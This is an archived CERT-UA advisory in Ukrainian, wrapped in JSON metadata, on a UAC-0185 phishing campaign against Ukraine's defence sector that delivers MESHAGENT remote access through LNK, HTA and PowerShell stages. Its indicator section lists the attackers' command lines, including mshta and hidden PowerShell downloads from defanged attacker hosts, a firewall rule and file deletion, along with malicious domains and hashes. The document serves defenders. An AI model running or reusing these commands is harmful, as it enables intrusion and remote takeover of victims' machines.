{
	"id": "dc6cf81a-c9a3-4cff-94d3-3a212db72ecf",
	"created_at": "2026-04-06T00:21:33.049592Z",
	"updated_at": "2026-04-10T03:30:50.74805Z",
	"deleted_at": null,
	"sha1_hash": "962181352eda4d044bce3cb8b322f2595c0f26c7",
	"title": "CERT-UA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2706764,
	"plain_text": "CERT-UA\r\nArchived: 2026-04-05 14:20:34 UTC\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA 04.12.2024 від\r\nфахівців MIL.CERT-UA отримано інформацію щодо розповсюдження електронних листів з темою \"до\r\nуваги_змiни_02-1-437 вiд 04.12.2024р.\", нібито, від імені Українського союзу промисловців та підприємців\r\n(УСПП) із запрошенням на конференцію, присвячену тематиці переходу продукції ОПК України на\r\nтехнічні стандарти НАТО, що проводилася в м.Києві 05.12.2024 у змішаному форматі.\r\nПри цьому, в листі містилося гіперпосилання \"Вкладення містить важливу інформацію для вашої участі.\",\r\nу разі переходу за яким на комп'ютер жертви буде завантажено файл-ярлик \"лист_02-1-437.lnk\". Відкриття\r\nLNK-файлу призведе до завантаження і запуску за допомогою штатної утиліти mshta.exe файлу \"start.hta\".\r\nЗгаданий HTA-файл містить JavaScript-код, призначений для запуску двох PowerShell-команд, одна з яких\r\nздійснить завантаження і вікдриття файлу-приманки у вигляді листа УСПП, а друга - завантаження файлу\r\n\"Front.png\", що є ZIP-архівом, в якому знаходяться три файли: \"Main.bat\", \"Registry.hta\" та \"update.exe\",\r\nвидобування вмісту архіву до каталогу \"%LOCALAPPDATA%\\Microsoft\\EdgeUpdate\\Update\\\" і запуск BAT-файлу \"Main.bat\".\r\nОстанній забезпечить переміщення файлу \"Registry.hta\" в каталог автозапуску, його виконання, а також\r\nвидалення з комп'ютера частини завантажених файлів.\r\nНасамкінець \"Registry.hta\" запустить \"update.exe\", який класифіковано як програму віддаленого керування\r\nMESHAGENT.\r\nВ процесі дослідження додатково виявлено файли та інфраструктуру, які використовувалися в кібератаках\r\nз початку 2023 року.\r\nЗагалом, активність UAC-0185 (UNC4221) здійснюється, щонайменше, з 2022 року. Основною\r\nспрямованістю угрупування є викрадення облікових даних месенджерів \"Signal\", \"Telegram\", \"WhatsApp\"\r\nта військових систем \"DELTA\", \"ТЕНЕТА\", \"Кропива\". Разом з тим, більш обмежено здійснюються\r\nкібератаки, що мають на меті отримання несанкціонованого віддаленого доступу до ЕОМ співробітників\r\nпідприємств оборонно-промислового комплексу, а також Сил оборони України з використанням\r\nспеціалізованих програмних засобів, зокрема, MESHAGENT та ULTRAVNC.\r\nІндикатори кіберзагроз\r\nФайли:\r\n4f8e66f060ea918637b5e2dfe7fff16d e763ba973e455e684cba6649461e41f488a4a041b23442846c82c532e3a78806\r\na5b1a7db7abf94163a2871d0d7359b49 bf576d4fcbecdff07f71af2ace12cc53a2e03b16c464d4aefb393c4e719ddb17\r\n92b698f674370120ec399ad47600477b 1ffcc81d9194d3f84c9056db6833c99182d0c47f501134cf11a7e20f76dd0833\r\nhttps://cert.gov.ua/article/6281632\r\nPage 1 of 6\n\n104cd6e96a9898462335b0e63766a983\r\nd2d5052b0c703a8b148aa6446d1a199aa59c590c5b534e45b03f1e8e74338c2b\r\n34d1bd73883fd4b1709f4a41af70a1926669f6cff75f27db3580ab76e4391245f8028c671198174a4ab0abbfc217f27c\r\n7b7ccd7899b0b3b52398df45faf85078 689c7b5a63740593af5f931edccd04e5a0af4592f2159da1dc6ff9fb85724d6d\r\n4dbd1ced8da2a4acec15cfd9be73bfcc 831548a4bf76e77acb9858fffd2bb9a03b210f04f2b615b916e1a086e5421202\r\nbbb96f2781bc16813af398d4a1c5867a 6c8ff9dde75352c94afac0045c6fecc5c27181a941c371d165be5dc6f167969c\r\n80ad42b66b4fc841bfa4210e23a2e757 6f4a305a1f5dbb11341986ad354aa5226afcb67b464d4914d9b3ec0c6cf7d887\r\nc15e1d4892f10a62fec973d37805cc65 de66a95291321c8877b1c403357147d0c636c1e69f487579f8a2978a7ad7e2eb\r\n99a0a704c31e84b0e8cb04c0f5ac2746 cb86993c83c30cd96c8b8fccd5236e5b5949ed400404c33ab74f173f7a9d53b9\r\n5883b5f221a9cb9dcdb4d7be923d4d98 57f5d4e69fb409ca448dcf7c281e130c66aff37178c827c4bdd6eebace0145e4\r\ne4d2f6d160ed8e4a2abd024dc9385ae1 71a27bc19cd4c3af587071d97afe205f1224f8a71d668683d1fba1969ea241a3\r\n882e5e17793b84ba2705b0e296777635 ff9002de29b7037bcf2d496a04df98aea4e8f81f88edf409cb65173e3cc194bd\r\n490450f5d2f1cb617e02366bc389bb7b 44cdc03e755bf1e7e60b460ab70834f44f7e4e9cb28591ffab99ca1517687ab2\r\nХостові:\r\n%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\r\n%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\Main.bat\r\n%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\Registry.hta\r\n%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\update.exe\r\n%HOMEDRIVE%%HOMEPATH%\\Downloads\\20241288346.pdf\r\n%HOMEDRIVE%%HOMEPATH%\\Main.zip\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Registry.hta\r\n%LOCALAPPDATA%\\Microsoft\\EdgeUpdate\\Update\\\r\n%LOCALAPPDATA%\\Microsoft\\EdgeUpdate\\Update\\Main.bat\r\n%LOCALAPPDATA%\\Microsoft\\EdgeUpdate\\Update\\Registry.hta\r\n%LOCALAPPDATA%\\Microsoft\\EdgeUpdate\\Update\\update.exe\r\n%USERPROFILE%\\Downloads\\20241288346.pdf\r\n%USERPROFILE%\\Main.zip\r\npowershell.exe . mshta hXXps://device.redirecl[.]com/yS558pd/start.hta\r\nmshta.exe hXXps://device.redirecl[.]com/yS558pd/start.hta\r\ncmd.exe /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Invoke-WebRequest hXXps:/\r\ncmd.exe /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Invoke-WebRequest hXXps:/\r\nExpand-Archive -LiteralPath %HOMEDRIVE%%HOMEPATH%\\Main.zip -Destinationpath %HOMEDRIVE%%HOMEPATH%\\App\r\ncmd.exe /c %HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\update.exe run\r\ncopy \"%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\Registry.hta\" \"%APPDATA%\\Micros\r\nstart \"\" \"%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\Registry.hta\"\r\nstart %HOMEDRIVE%%HOMEPATH%\\Downloads\\20240188346.pdf\r\ndel /s /q \"%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\Main.bat\"\r\ndel /s /q \"%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\Registry.hta\"\r\ndel /s /q \"%HOMEDRIVE%%HOMEPATH%\\Downloads\\*.zip\"\r\ndel /s /q \"%HOMEDRIVE%%HOMEPATH%\\Main.zip\"\r\nmkdir \"%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\"\r\nrmdir /s /q \"%systemdrive%\\$Recycle.bin\"\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Update.lnk\r\nhttps://cert.gov.ua/article/6281632\r\nPage 2 of 6\n\n%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\Update.lnk\r\n%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\gnv.exe\r\n%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\rr.vbs\r\ndel /s /q \"%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\Update.lnk\"\r\ndel /s /q \"%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\rr.vbs\"\r\ndel /s /q \"%HOMEDRIVE%%HOMEPATH%\\SS.bat\"\r\nnetsh advfirewall firewall add rule name=\"vnc\" dir=in program=%HOMEDRIVE%%HOMEPATH%\\AppData\\Local\\Mic\r\npowershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Invoke-WebRequest hXXps://plntr.acco\r\npowershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Invoke-WebRequest hXXps://plntr.acco\r\npowershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"start %HOMEDRIVE%%HOMEPATH%\\AppData\\\r\nМережеві:\r\nmititarycua@gmail[.]com\r\nhXXps://live.outloolc[.]com/mail_inbox=a098m\r\n(smb)://device.redirecl[.]com/davwwwroot/downloads/лист_02-1-437.lnk\r\nhXXps://device.redirecl[.]com/yS558pd/start.hta\r\nhXXps://mail.outloolc[.]com/yS558pd/Back.png\r\nhXXps://mail.outloolc[.]com/yS558pd/Front.png\r\nhXXp://svc.odwebp[.]com:443/agent.ashx\r\n(wss)://svc.odwebp[.]com:443/agent.ashx\r\n146[.]59.102.122\r\n185[.]158.248.104\r\nlive.outloolc[.]com\r\nmail.outloolc[.]com\r\ndevice.redirecl[.]com\r\nsvc.odwebp[.]com\r\nuspp.derzhposluhy[.]com\r\nodwebp[.]com\r\noutloolc[.]com\r\nredirecl[.]com\r\nderzhposluhy[.]com\r\ni-ua.account-guard[.]site\r\ntelegram.defender-bot[.]site\r\ntelegram.token-defender[.]cloud\r\naccount-guard[.]site\r\ndefender-bot[.]site\r\ntoken-defender[.]cloud\r\n(tcp)://mirotrent[.]com:443\r\n(tcp)://plntr.mirotrent[.]com:443\r\nhXXps://cloud.account-viewer[.]com/tW018lIK/16_01.zip\r\nhXXps://get.god-le[.]com/hS483kf/Dack.png\r\nhXXps://get.god-le[.]com/hS483kf/Front.png\r\nhXXps://get.god-le[.]com/Gm912cj/icon.png\r\nhttps://cert.gov.ua/article/6281632\r\nPage 3 of 6\n\nhXXps://plntr.account-viewer[.]com/xS43HI3D/logo.png\r\nhXXps://plntr.account-viewer[.]com/xS43HI3D/Back.png\r\nhXXps://plntr.account-viewer[.]com/xS43HI3D/Front.png\r\n136[.]243.237.26\r\n5[.]181.156.72\r\naccount-viewer[.]com\r\ngod-le[.]com\r\ngod-le[.]net\r\nin-touc[.]com\r\nmail-gov[.]com\r\nmail-gov[.]net\r\nsign-cert[.]com\r\nmirotrent[.]com\r\npalantir[.]ink\r\nclouddrive[.]world\r\nemtserviceca[.]info\r\naccount-saver[.]com\r\nmails[.]support\r\ncheck.sign-cert[.]com\r\ncloud.account-viewer[.]com\r\ncloud.god-le[.]net\r\nconfirm.account-viewer[.]com\r\ndevice.redirecl[.]com\r\ndhl.redirecl[.]com\r\ndrive.redirecl[.]com\r\nget.god-le[.]com\r\nget.in-touc[.]com\r\nget.mail-gov[.]com\r\nget.sign-cert[.]com\r\nivanti.account-viewer[.]com\r\nplntr.mirotrent[.]com\r\nmy.mail-gov[.]net\r\nplntr.account-viewer[.]com\r\nstellar.account-viewer[.]com\r\nДодаткові індикатори за більш ранні періоди\r\n2022-09-12:\r\n74f6bd1a80ebfeece1e65b441c2f46e2\r\ndelta_1.0.0.apk\r\nhXXp://185[.]225.35.75:30555/cc\r\n185[.]225.35.75\r\n217[.]144.102.219\r\n45[.]147.179.185\r\n46[.]30.44.144\r\n62[.]113.110.100\r\ncancel-auth[.]site\r\nconfirmphone[.]site\r\nhttps://cert.gov.ua/article/6281632\r\nPage 4 of 6\n\nmilgov[.]host\r\nmilgov[.]site\r\nteiegram[.]host\r\ntelegram-account[.]host\r\ntelegram-auth[.]website\r\ntelegramm-account[.]site\r\nweb-telegram[.]host\r\ndelta.milgov[.]site\r\nweb.teiegram[.]host\r\nweb.telegram-account[.]host\r\nweb.telegramm-account[.]site\r\nweb.web.telegram-account[.]host\r\nwww.teiegram[.]host\r\nwww.telegram-auth[.]website\r\nwww.telegramm-account[.]site\r\n212nj0b42w.web.telegram-account[.]host\r\n658pvbhj2k7veemmv4.web.telegram-account[.]host\r\nspam.web-telegram[.]host\r\nhXXp://185[.]225.35.75:30555/cc\r\nhXXps://delta.milgov[.]site/\r\nhXXps://web.telegram-account[.]host/\r\nhXXps://web.telegram-account[.]host/#/login\r\n2024-01-16:\r\n176[.]57.212.217\r\n193[.]203.202.168\r\n217[.]151.229.29\r\nkropyva[.]group\r\nkropyva[.]site\r\nteneta[.]group\r\nteneta[.]site\r\ngroup-teneta[.]online\r\ngroup.kropyva[.]site\r\ngroup.teneta[.]site\r\n(wss)://kropyva[.]group/qr\r\nhXXps://group-teneta[.]online/\r\nhXXps://group.teneta[.]site/\r\nhXXps://kropyva[.]group/\r\n2024-03-29:\r\nwhatsapp-confirm[.]site\r\npassport-ukr-net[.]site\r\nprotect-password[.]site\r\ntelegram-confirm[.]site\r\naccept-action[.]site\r\nsignal-confirm[.]site\r\ncancel-action[.]site\r\nhttps://cert.gov.ua/article/6281632\r\nPage 5 of 6\n\ndrive-share[.]site\r\nshare-drive[.]site\r\ngroup-invitation[.]site\r\ncheck-active[.]site\r\nqweasdzx[.]site\r\nqsrgh[.]site\r\nwww.protect-password[.]site\r\nwww.confirm-signal[.]site\r\nwww.google-drive[.]site\r\nwww.signal-confirm[.]site\r\nwww.qsrgh[.]site\r\nwww.accept-action[.]site\r\nwhatsapp.protect-password[.]site\r\ntelegram.check-active[.]site\r\nwhatsapp.group-invitation[.]site\r\ngoogle.drive-share[.]site\r\ngoogle.share-drive[.]site\r\ntelegram.qweasdzx[.]site\r\nГрафічні зображення\r\nРис.1 Приклад ланцюга ураження\r\nSource: https://cert.gov.ua/article/6281632\r\nhttps://cert.gov.ua/article/6281632\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cert.gov.ua/article/6281632"
	],
	"report_names": [
		"6281632"
	],
	"threat_actors": [
		{
			"id": "a7ff9823-17a0-4fcd-955e-ade8164bd827",
			"created_at": "2024-12-21T02:00:02.861322Z",
			"updated_at": "2026-04-10T02:00:03.7962Z",
			"deleted_at": null,
			"main_name": "UAC-0185",
			"aliases": [
				"UNC4221"
			],
			"source_name": "MISPGALAXY:UAC-0185",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434893,
	"ts_updated_at": 1775791850,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/962181352eda4d044bce3cb8b322f2595c0f26c7.pdf",
		"text": "https://archive.orkl.eu/962181352eda4d044bce3cb8b322f2595c0f26c7.txt",
		"img": "https://archive.orkl.eu/962181352eda4d044bce3cb8b322f2595c0f26c7.jpg"
	}
}